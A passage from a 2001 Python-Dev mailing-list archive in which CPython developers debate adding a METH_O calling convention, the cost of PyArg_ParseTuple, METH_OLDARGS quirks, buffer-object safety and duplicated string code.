The main point of this patch is to MvL> improve efficiency, and (according to Jeremy's analysis), most MvL> of the time for calling a function is spent in MvL> PyArg_ParseTuple. I'd like to qualify this a bit. What I reported earlier is that the BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in PyArg_ParseTuple(). This strikes me as excessive, because it's a static property of the code. (One could imagine writing a Python script that parsed the "O!|is#" format strings and generated efficient, specialized C code for that format.) If we benchmark other programs, particularly those that do more work in the builtins, the relative cost of the argument processing will be lower. Jeremy From jeremy at digicool.com Sun May 27 20:55:36 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Sun, 27 May 2001 14:55:36 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> Message-ID: <15121.19880.775931.946049@slothrop.digicool.com> >>>>> "TP" == Tim Peters writes: TP> Do METH_O, convert every "O" function to use it, declare TP> victory, and enjoy the weekend . TP> 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- TP> size-ly y'rs - tim How is METH_O different than METH_OLDARGS? The old-style argument passing is definitely the most efficient for functions of zero or one arguments. There's special-case code in ceval to support these cases -- fast_cfunction() -- primarily because in these cases the function can be invoked by using arguments directly from the Python stack instead of copying them to a tuple first. Jeremy From tim.one at home.com Sun May 27 22:37:43 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:37:43 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19880.775931.946049@slothrop.digicool.com> Message-ID: [Jeremy] > How is METH_O different than METH_OLDARGS? I have no idea: can you explain it?
The #define's for these symbols are uncommented, and it's a mystery to me what they're *supposed* to mean. > The old-style argument passing is definitely the most efficient for > functions of zero or one arguments. There's special-case code in > ceval to support these cases -- fast_cfunction() -- primarily > because in these cases the function can be invoked by using arguments > directly from the Python stack instead of copying them to a tuple > first. OK, I'm looking in bltinmodule.c, at builtin_len. It starts like so:

    static PyObject *
    builtin_len(PyObject *self, PyObject *args)
    {
        PyObject *v;
        long res;

        if (!PyArg_ParseTuple(args, "O:len", &v))
            return NULL;

So it's clearly expecting a tuple. But its entry in the builtin_methods[] table is:

    {"len", builtin_len, 1, len_doc},

That is, it says nothing about the calling convention. Since C fills in a 0 for missing values, and methodobject.c has

    /* Flag passed to newmethodobject */
    #define METH_OLDARGS  0x0000
    #define METH_VARARGS  0x0001
    #define METH_KEYWORDS 0x0002

then doesn't the struct for builtin_len implicitly specify METH_OLDARGS? But if that's true, and fast_cfunction() does not create a tuple in this case, how is it that builtin_len gets a tuple? Something doesn't add up here. Or does it? There's no *reference* to METH_OLDARGS anywhere in the code base other than its definition and its use in method tables, so whatever code *keys* off it must be assuming a hardcoded 0 value for it -- or indeed nothing keys off it at all. I expect this line in ceval.c is doing the dirty assumption:

    } else if (flags == 0) {

and should be testing against METH_OLDARGS instead. But I see that builtin_len is falling into the METH_VARARGS case despite that it wasn't declared that way and that it sure looks like METH_OLDARGS (0) is the default. Confusing! Fix it .
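Tim's complaint about the hardcoded `1` in the method table and the bare `flags == 0` test in ceval.c can be illustrated with a small, self-contained sketch that uses the flag names everywhere. Only the three #define values come from the thread. `method_entry`, `classify` and the `legacy_func` entry are hypothetical, and the real dispatch in ceval.c does much more than classify.

```c
#include <assert.h>

/* Flag values as quoted from methodobject.c in this thread. */
#define METH_OLDARGS  0x0000
#define METH_VARARGS  0x0001
#define METH_KEYWORDS 0x0002

enum convention { CONV_OLDARGS, CONV_VARARGS, CONV_VARARGS_KW, CONV_UNKNOWN };

/* Trimmed-down, hypothetical method table entry (the real one also carries
   the C function pointer and the doc string). */
typedef struct {
    const char *name;
    int flags;
} method_entry;

/* Spell the flags by name instead of writing a bare 1. */
static const method_entry table[] = {
    {"len", METH_VARARGS},          /* was: {"len", builtin_len, 1, len_doc} */
    {"legacy_func", METH_OLDARGS},  /* hypothetical old-style entry */
};

/* Compare against METH_OLDARGS by name instead of "flags == 0", so every
   dependency on the convention is visible to a reader (and to grep). */
static enum convention classify(int flags)
{
    switch (flags) {
    case METH_OLDARGS:                 return CONV_OLDARGS;
    case METH_VARARGS:                 return CONV_VARARGS;
    case METH_VARARGS | METH_KEYWORDS: return CONV_VARARGS_KW;
    default:                           return CONV_UNKNOWN; /* left unclassified here */
    }
}
```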
From tim.one at home.com Sun May 27 22:46:29 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 16:46:29 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim, thrashing] > ... > So it's clearly expecting a tuple. But its entry in the builtin_methods[] > table is: > > {"len", builtin_len, 1, len_doc}, > > That is, it says nothing about the calling convention. Oops, it does, using a hardcoded 1 instead of the METH_VARARGS #define. So that explains that. Next question: why isn't builtin_len using METH_OLDARGS instead? Is there some advantage to using METH_VARARGS in this case? This gets back to what these #defines are intended to *mean*, and I still haven't figured that out. From mwh at python.net Sun May 27 23:32:48 2001 From: mwh at python.net (Michael Hudson) Date: Sun, 27 May 2001 22:32:48 +0100 (BST) Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: On Sun, 27 May 2001, Tim Peters wrote: > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? So you can't do

    >>> len(1,2)
    2

a la list.append, socket.connect pre 2.0? (or was it 1.6?) My impression is that generally METH_VARARGS is saner than METH_OLDARGS (i.e. more consistent). It seems the proposed METH_O is basically METH_OLDARGS + the restriction that there is in fact only one argument, so we save a tuple allocation over METH_VARARGS, but get argument count checking over METH_OLDARGS. Cheers, M. From tim.one at home.com Mon May 28 00:49:38 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 18:49:38 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: Message-ID: [Tim] > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > there some advantage to using METH_VARARGS in this case? [Michael Hudson] > So you can't do > > >>> len(1,2) > 2 > > a la list.append, socket.connect pre 2.0? (or was it 1.6?)
If I didn't know better, I'd suspect Python's internal calling conventions at the start didn't perfectly anticipate all future developments. Among other things, looks like it's impossible for a METH_OLDARGS function to distinguish between being called with more than one argument and being called with a single tuple argument. > My impression is that generally METH_VARARGS is saner than METH_OLDARGS > (i.e. more consistent). Yes, METH_OLDARGS does appear to, well, suck. > It seems the proposed METH_O is basically METH_OLDARGS + the > restriction that there is in fact only one argument, so we save > a tuple allocation over METH_VARARGS, Also, and more importantly, save the PyArg_ParseTuple call on the receiving end. > but get argument count checking over METH_OLDARGS. Which is worth getting. I'm back to where I started here: Do METH_O, convert every "O" function to use it, declare victory, and enjoy the weekend. 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code-size-ly y'rs - tim PS: But today I'll add another: add at least one comment to the code -- this stuff is a bitch to reverse-engineer. From thomas at xs4all.net Mon May 28 00:50:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:50:58 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from mwh@python.net on Sun, May 27, 2001 at 10:32:48PM +0100 References: Message-ID: <20010528005058.H690@xs4all.nl> On Sun, May 27, 2001 at 10:32:48PM +0100, Michael Hudson wrote: > On Sun, 27 May 2001, Tim Peters wrote: > > Next question: why isn't builtin_len using METH_OLDARGS instead? Is > > there some advantage to using METH_VARARGS in this case? > So you can't do > >>> len(1,2) > 2 > a la list.append, socket.connect pre 2.0? (or was it 1.6?) And don't forget the method-specific errormessage by passing ':len' in the format string.
Of course, this can easily be (and probably should) done by passing another argument to whatever parses arguments in METH_O, rather than invoking string parsing magic every call. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Mon May 28 00:58:30 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 00:58:30 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: ; from tim.one@home.com on Sun, May 27, 2001 at 06:49:38PM -0400 References: Message-ID: <20010528005830.I690@xs4all.nl> On Sun, May 27, 2001 at 06:49:38PM -0400, Tim Peters wrote: > 1%-of-the-work-for-80%-of-the-gain-and-an-overall-decrease-in-code- > size-ly y'rs - tim And recycle a quote a day ;) > PS: But today I'll add another: add at least one comment to the code -- > this stuff is a bitch to reverse-engineer. But not just any comment, please! The Pine sourcecode is riddled with calls to 'mm_critical(stream)', and each call I've seen so far is nicely commented with the utterly useless comment '/* go critical */'. I'd-gladly-trade-in-every-mm_critical-comment-for-one-comment-to-describe- -what-Pine-actually-tries-to-do-ly y'rs, -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From martin at loewis.home.cs.tu-berlin.de Mon May 28 00:45:53 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. 
Loewis) Date: Mon, 28 May 2001 00:45:53 +0200 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT)) References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de> <3B0E1E2C.4BC121B5@lemburg.com> <200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de> <3B0ED0C7.F1A665EA@lemburg.com> <200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de> <3B0F7D44.1A12CE0F@lemburg.com> <200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com> Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de> > I'd like to qualify this a bit. What I reported earlier is that the > BuiltinFuntionCall microbenchmark in pybench spends 30% of its time in > PyArg_ParseTuple(). This strikes me as excessive, because it's a > static property of the code. (One could imagine writing a Python > script that parsed the "O!|is#" format strings and generated > efficient, specialized C code for that format.) > > If we benchmark other programs, particularly those that do more work > in the builtins, the relative cost of the argument processing will be > lower. Certainly: If the work inside the function increases, the overhead of calling it will be less visible. What the benchmark shows, however, and what my patch addresses, is that the time for *calling* a function is primarily spent in PyArg_ParseTuple (and not in, say, building argument tuples, putting parameters on the stack, fetching function addresses, building method objects, and so on). Regards, Martin From tim.one at home.com Mon May 28 01:17:27 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 19:17:27 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <20010528005058.H690@xs4all.nl> Message-ID: [Thomas Wouters] > And don't forget the method-specific errormessage by passing ':len' in > the format string. 
Of course, this can easily be (and probably should) > done by passing another argument to whatever parses arguments in > METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the TypeError it raises when a METH_O call doesn't get exactly one argument, or gets a (one or more) keyword argument. Stick to METH_O and it's a clear win, even in this respect: there's no info in an explicit ":len" he's not already deducing, and almost all instances of "O:name" formats today are exactly the same this way:

    if (!PyArg_ParseTuple(args, "O:abs", &v))
    if (!PyArg_ParseTuple(args, "O:callable", &v))
    if (!PyArg_ParseTuple(args, "O:id", &v))
    if (!PyArg_ParseTuple(args, "O:hash", &v))
    if (!PyArg_ParseTuple(args, "O:hex", &v))
    if (!PyArg_ParseTuple(args, "O:float", &v))
    if (!PyArg_ParseTuple(args, "O:len", &v))
    if (!PyArg_ParseTuple(args, "O:list", &v))
    else if (!PyArg_ParseTuple(args, "O:min/max", &v))
    if (!PyArg_ParseTuple(args, "O:oct", &v))
    if (!PyArg_ParseTuple(args, "O:ord", &obj))
    if (!PyArg_ParseTuple(args, "O:reload", &v))
    if (!PyArg_ParseTuple(args, "O:repr", &v))
    if (!PyArg_ParseTuple(args, "O:str", &v))
    if (!PyArg_ParseTuple(args, "O:tuple", &v))
    if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called extremely frequently in *some* programs. The only oddball is min/max, but then it supports more than one call-list format and so isn't a METH_O candidate anyway. Indeed, Martin's patch gives a *better* message than we get for some mistakes today:

    >>> len(val=2)
    Traceback (most recent call last):
      File "<stdin>", line 1, in ?
    TypeError: len() takes exactly 1 argument (0 given)
    >>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case. He should add "()" after the function name.
He should also throw away the half of the patch complicating and slowing METH_O to get some theoretical speedup in other cases: make the one-arg builtins fly just as fast as humanly possible. From greg at cosc.canterbury.ac.nz Mon May 28 02:23:55 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:23:55 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz> > However, it has one fatal flaw, and no one seems > to know what to do about it. I think it would be safe if: 1) it kept a reference to the underlying object, and 2) it re-fetched the pointer and length info each time it was needed, using the underlying object's buffer interface. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From greg at cosc.canterbury.ac.nz Mon May 28 02:28:41 2001 From: greg at cosc.canterbury.ac.nz (Greg Ewing) Date: Mon, 28 May 2001 12:28:41 +1200 (NZST) Subject: [Python-Dev] strop vs. string In-Reply-To: <20010525132752.B5402@lyra.org> Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz> Greg Stein > "badly" is overstating the problem. It caches a pointer when it shouldn't. > This doesn't work well But "doesn't work well" means "can crash the interpreter". I don't think "badly" is an overstatement here... Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg at cosc.canterbury.ac.nz +--------------------------------------+ From tim.one at home.com Mon May 28 03:42:30 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:42:30 -0400 Subject: [Python-Dev] strop vs. 
string In-Reply-To: <3B10D758.3741AC2F@lemburg.com> Message-ID: [MAL] > I guess there are three ways to "solve" this: > > a) mutable types don't implement the getreadbuf interface Of the few types that implement it today, that would leave only strings (8-bit and Unicode). Too much machinery just for that. Besides, I once posted an example to c.l.py showing how to use regexps to search mmap'ed files, so *that* must continue to work forever . > b) the getreadbuf interface is complemented with a callback > interface, so that the buffer object can be notified of > the change I like this best, although there's no bound on the number of buffers that may need to be notified in case of change (i.e., the object would need to maintain a list of buffers to be notified). > c) calling getreadbuf on a mutable object causes this object > to become immutable Even easier, core dump as soon as getreadbuf is called . [Greg Ewing] > I think it would be safe if: > > 1) it kept a reference to the underlying object, and That much it already does. > 2) it re-fetched the pointer and length info each time it was > needed, using the underlying object's buffer interface. If after b = buffer(some_object) b.__getitem__ needed to refetch the info between b[i] and b[i+1] I expect it would be so slow even Greg wouldn't want it anymore. From tim.one at home.com Mon May 28 03:52:18 2001 From: tim.one at home.com (Tim Peters) Date: Sun, 27 May 2001 21:52:18 -0400 Subject: [Python-Dev] strop vs. string In-Reply-To: <3B0FD023.C4588919@lemburg.com> Message-ID: [Tim] > About combining strop and buffers and strings, don't forget > unicodeobject.c: that's got oodles of basically duplicate code too. > /F suggested dealing with the minor differences via maintaining one > code file that gets compiled multiple times w/ appropriate #defines. [MAL] > Hmm, that only saves us a few kB in source, but certainly not > in the object files. That's not the point.
Manually duplicated code blocks always get out of synch, as people fix bugs in, or enhance, one of them but don't even know about the others. /F brought this up after I pissed away a few hours trying to repair one of these in all places, and he noted that strop.replace() and string.replace() are woefully inefficient anyway. > The better idea would be making the types subclass from a generic > abstract string object -- I just don't know how this will be > possible with Guido's type patches. We'll just have to wait, > I guess. Wait for what? If it were possible, is the chance that you'd take time to rework unicodeobject.c to "subclass from a generic abstract string object" greater than 0? The chance that I would is exactly 0. From martin at loewis.home.cs.tu-berlin.de Mon May 28 08:36:49 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 08:36:49 +0200 Subject: [Python-Dev] Special-casing "O" Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> > How is METH_O different than METH_OLDARGS? METH_O will raise an exception if the function is called with more than one argument, without calling the function. METH_OLDARGS will pass a tuple in this case. I believe you cannot distinguish between a single tuple argument and an invocation with multiple arguments in a METH_OLDARGS function, is that true? Regards, Martin From martin at loewis.home.cs.tu-berlin.de Mon May 28 09:40:54 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 28 May 2001 09:40:54 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> When investigating calling conventions, I took a special look at METH_OLDARGS occurrences. While most of them look reasonable, file.writelines caught my attention. 
It has

    if (args == NULL || !PySequence_Check(args)) {
        PyErr_SetString(PyExc_TypeError,
            "writelines() argument must be a sequence of strings");
        return NULL;
    }

Because it is a METH_OLDARGS method, you can do

    f=open("/tmp/x","w")
    f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this call illegal. Does anybody see a problem with that change in semantics? Regards, Martin From thomas at xs4all.net Mon May 28 10:17:58 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Mon, 28 May 2001 10:17:58 +0200 Subject: [Python-Dev] file.writelines("foo\n","bar\n") In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200 References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de> Message-ID: <20010528101758.K690@xs4all.nl> On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote: > When investigating calling conventions, I took a special look at > METH_OLDARGS occurrences. While most of them look reasonable, > file.writelines caught my attention. It has > if (args == NULL || !PySequence_Check(args)) { > PyErr_SetString(PyExc_TypeError, > "writelines() argument must be a sequence of strings"); > return NULL; > } > Because it is a METH_OLDARGS method, you can do > f=open("/tmp/x","w") > f.writelines("foo\n","bar\n") > With my upcoming patches, I'd replace this with METH_O, making this > call illegal. Does anybody see a problem with that change in > semantics? Hell yeah. About the same problem as with the 'l.append("foo", "bar")' problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in 2.0, by converting a PyList_Check into a PySequence_Check: $ python1.5 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") Traceback (innermost last): File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings $ python2.0 >>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n") >>> I do think we'll have to allow for this for one more release, with warnings and all. It's extremely unlikely that anyone is using this, but changing it without warning will definitely not benefit 2.x's image wrt. stability ;P If bugfix-releases were allowed to generate additional warnings, I'd add a warning to 2.1.1.... -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From mal at lemburg.com Mon May 28 11:04:51 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:04:51 +0200 Subject: [Python-Dev] strop vs. string References: Message-ID: <3B1214B3.9A4C295D@lemburg.com> Tim Peters wrote: > > [Tim] > > About combining strop and buffers and strings, don't forget > > unicodeobject.c: that's got oodles of basically duplicate code too. > > /F suggested dealing with the minor differences via maintaining one > > code file that gets compiled multiple times w/ appropriate #defines. > > [MAL] > > Hmm, that only saves us a few kB in source, but certainly not > > in the object files. > > That's not the point. Manually duplicated code blocks always get out of > synch, as people fix bugs in, or enhance, one of them but don't even know > about the others. /F brought this up after I pissed away a few hours trying > to repair one of these in all places, and he noted that strop.replace() and > string.replace() are woefully inefficient anyway. Ok, so what we'd need is a bunch of generic low-level string operations: one set for 8-bit and one for 16-bit code. Looking at unicodeobject.c it seems that the section "Helpers" would be a good start, plus perhaps a few bits from the method implementations refactored to form a low-level string template library.
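/F's suggestion, quoted above, is to keep one code file and compile it several times with appropriate #defines for the character type. Python cannot show the preprocessor trick, but the underlying idea (one implementation serving both the 8-bit and the Unicode string types) can be sketched with a helper that relies only on operations bytes and str have in common. count_occurrences is a hypothetical name used for illustration, not part of any real API.

```python
def count_occurrences(haystack, needle):
    """Count non-overlapping occurrences of needle in haystack.

    Written once against the small interface bytes and str share
    (len() and .find()), much as a single C helper file could be
    compiled once per character width.
    """
    if len(needle) == 0:
        # Same convention as str.count / bytes.count for an empty needle.
        return len(haystack) + 1
    count = 0
    pos = haystack.find(needle)
    while pos != -1:
        count += 1
        # Resume after this match so occurrences do not overlap.
        pos = haystack.find(needle, pos + len(needle))
    return count


if __name__ == "__main__":
    # The same code path serves both string types.
    print(count_occurrences("abcabc", "bc"), count_occurrences(b"abcabc", b"bc"))
```

A bug fixed in this one function is fixed for both types at once, which is the maintenance argument Tim makes against manually duplicated code blocks.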
Perhaps we should move this code into a file stringhelpers.h which then gets included by stringobject.c and unicodeobject.c with appropriate #defines set up for 8-bit strings and for Unicode. > > The better idea would be making the types subclass from a generic > > abstract string object -- I just don't know how this will be > > possible with Guido's type patches. We'll just have to wait, > > I guess. > > Wait for what? If it were possible, is the chance that you'd take time to > rework unicodeobject.c to "subclass from a generic abstract string object" > greater than 0? The chance that I would is exactly 0. Well, that's hard to say. It would certainly be low-priority; same for the above refactoring. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mal at lemburg.com Mon May 28 11:19:16 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 28 May 2001 11:19:16 +0200 Subject: [Python-Dev] Special-casing "O" References: Message-ID: <3B121814.E5E9896A@lemburg.com> Tim Peters wrote: > > [Thomas Wouters] > > And don't forget the method-specific errormessage by passing ':len' in > > the format string. Of course, this can easily be (and probably should) > > done by passing another argument to whatever parses arguments in > > METH_O, rather than invoking string parsing magic every call. > > Martin's patch automatically inserts the name of the function in the > TypeError it raises when a METH_O call doesn't get exactly one argument, or > gets a (one or more) keyword argument. 
> > Stick to METH_O and it's a clear win, even in this respect: there's no info > in an explicit ":len" he's not already deducing, and almost all instances of > "O:name" formats today are exactly the same this way: > > if (!PyArg_ParseTuple(args, "O:abs", &v)) > if (!PyArg_ParseTuple(args, "O:callable", &v)) > if (!PyArg_ParseTuple(args, "O:id", &v)) > if (!PyArg_ParseTuple(args, "O:hash", &v)) > if (!PyArg_ParseTuple(args, "O:hex", &v)) > if (!PyArg_ParseTuple(args, "O:float", &v)) > if (!PyArg_ParseTuple(args, "O:len", &v)) > if (!PyArg_ParseTuple(args, "O:list", &v)) > else if (!PyArg_ParseTuple(args, "O:min/max", &v)) > if (!PyArg_ParseTuple(args, "O:oct", &v)) > if (!PyArg_ParseTuple(args, "O:ord", &obj)) > if (!PyArg_ParseTuple(args, "O:reload", &v)) > if (!PyArg_ParseTuple(args, "O:repr", &v)) > if (!PyArg_ParseTuple(args, "O:str", &v)) > if (!PyArg_ParseTuple(args, "O:tuple", &v)) > if (!PyArg_ParseTuple(args, "O:type", &v)) > > Those are all the ones in bltinmodule.c, and nearly all of them are called > extremely frequently in *some* programs. The only oddball is min/max, but > then it supports more than one call-list format and so isn't a METH_O > candidate anyway. Indeed, Martin's patch gives a *better* message than we > get for some mistakes today: > > >>> len(val=2) > Traceback (most recent call last): > File "<stdin>", line 1, in ? > TypeError: len() takes exactly 1 argument (0 given) > >>> > > Martin's would say > > TypeError: len takes no keyword arguments > > in this case. He should add "()" after the function name. He should also > throw away the half of the patch complicating and slowing METH_O to get some > theoretical speedup in other cases: make the one-arg builtins fly just as > fast as humanly possible. If we end up only optimizing the re.match("O+") case, we wouldn't need the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick and Martin could call the underlying API with one or more PyObject* taken directly from the Python VM stack.
In that case, please consider at least supporting "O", "OO" and "OOO" with optional arguments treated like I suggested in an earlier posting (simply pass NULL and let the API take care of assigning a default value). This would take care of most builtins:

Python/bltinmodule.c:
    if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
    if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
    if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
    if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
    if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
    if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
    if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
    if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
    if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
    if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
    if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
    if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
    if (!PyArg_ParseTuple(args, "O:abs", &v))
    if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
    if (!PyArg_ParseTuple(args, "O:callable", &v))
    if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
    if (!PyArg_ParseTuple(args, "O:id", &v))
    if (!PyArg_ParseTuple(args, "O:hash", &v))
    if (!PyArg_ParseTuple(args, "O:hex", &v))
    if (!PyArg_ParseTuple(args, "O:float", &v))
    if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
    if (!PyArg_ParseTuple(args, "O:len", &v))
    if (!PyArg_ParseTuple(args, "O:list", &v))
    if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
    else if (!PyArg_ParseTuple(args, "O:min/max", &v))
    if (!PyArg_ParseTuple(args, "O:oct", &v))
    if (!PyArg_ParseTuple(args, "O:ord", &obj))
    if (!PyArg_ParseTuple(args, "O:reload", &v))
    if (!PyArg_ParseTuple(args, "O:repr", &v))
    if (!PyArg_ParseTuple(args, "O:str", &v))
    if (!PyArg_ParseTuple(args, "O:tuple", &v))
    if (!PyArg_ParseTuple(args, "O:type", &v))

-- Marc-Andre
Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From jeremy at digicool.com Mon May 28 18:45:27 2001 From: jeremy at digicool.com (Jeremy Hylton) Date: Mon, 28 May 2001 12:45:27 -0400 (EDT) Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: <15122.32935.53414.174221@slothrop.digicool.com> >>>>> "MvL" == Martin v Loewis writes: >> How is METH_O different than METH_OLDARGS? MvL> METH_O will raise an exception if the function is called with MvL> more than one argument, without calling the MvL> function. METH_OLDARGS will pass a tuple in this case. Yes, I see that now. I'm +1 on METH_O, then. Jeremy From tim.one at home.com Mon May 28 19:23:47 2001 From: tim.one at home.com (Tim Peters) Date: Mon, 28 May 2001 13:23:47 -0400 Subject: [Python-Dev] Special-casing "O" In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis] > ... > I believe you cannot distinguish between a single tuple argument and > an invocation with multiple arguments in a METH_OLDARGS function, is > that true? That's the conclusion I reached after staring at the code.. From fdrake at acm.org Mon May 28 20:20:01 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:20:01 -0400 (EDT) Subject: [Python-Dev] Removing doc/howto on python.org In-Reply-To: References: Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com> Andrew Kuchling writes: > Looking at a bug report Fred forwarded, I realized that after > py-howto.sourceforge.net was set up, www.python.org/doc/howto was > never changed to redirect to the SF site instead. As of this > afternoon, that's now done; links on www.python.org have been updated, > and I've added the redirect. 
> > Question: is it worth blowing away the doc/howto/ tree now, or should > it just be left there, inaccessible, until work on www.python.org > resumes? Andrew, It looks like I never replied to this. It's probably dropped off your radar, but I'd say the answer is that the files on parrot should be discarded sooner rather than later -- when we actually manage to work on python.org we're that much more likely to have forgotten the redirection entirely! -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From fdrake at acm.org Mon May 28 20:33:13 2001 From: fdrake at acm.org (Fred L. Drake, Jr.) Date: Mon, 28 May 2001 14:33:13 -0400 (EDT) Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases) In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico> References: <200103112137.QAA13084@cj20424-a.reston1.va.home.com> <001c01c0aa95$55836f60$325821c0@newmexico> Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com> Guido wrote: > Actually, I intend to deprecate locals(). For now, globals() are > fine. I also intend to deprecate vars(), at least in the form that is > equivalent to locals(). Samuele Pedroni writes: > That's fine for me. Will that deprecation be already active with 2.1, e.g > having locals() and param-less vars() raise a warning. > I imagine a (new) function that produce a snap-shot of the values in the > local,free and cell vars of a scope can do the job required for simple > debugging (the copy will not allow to modify back the values), > or another approach... Nothing has happened on this front yet. Should I add deprecation notes to the documentation while Guido is on vacation, or wait to ask him when he gets back? Or was this matter resolved when I wasn't paying attention? -Fred -- Fred L. Drake, Jr.
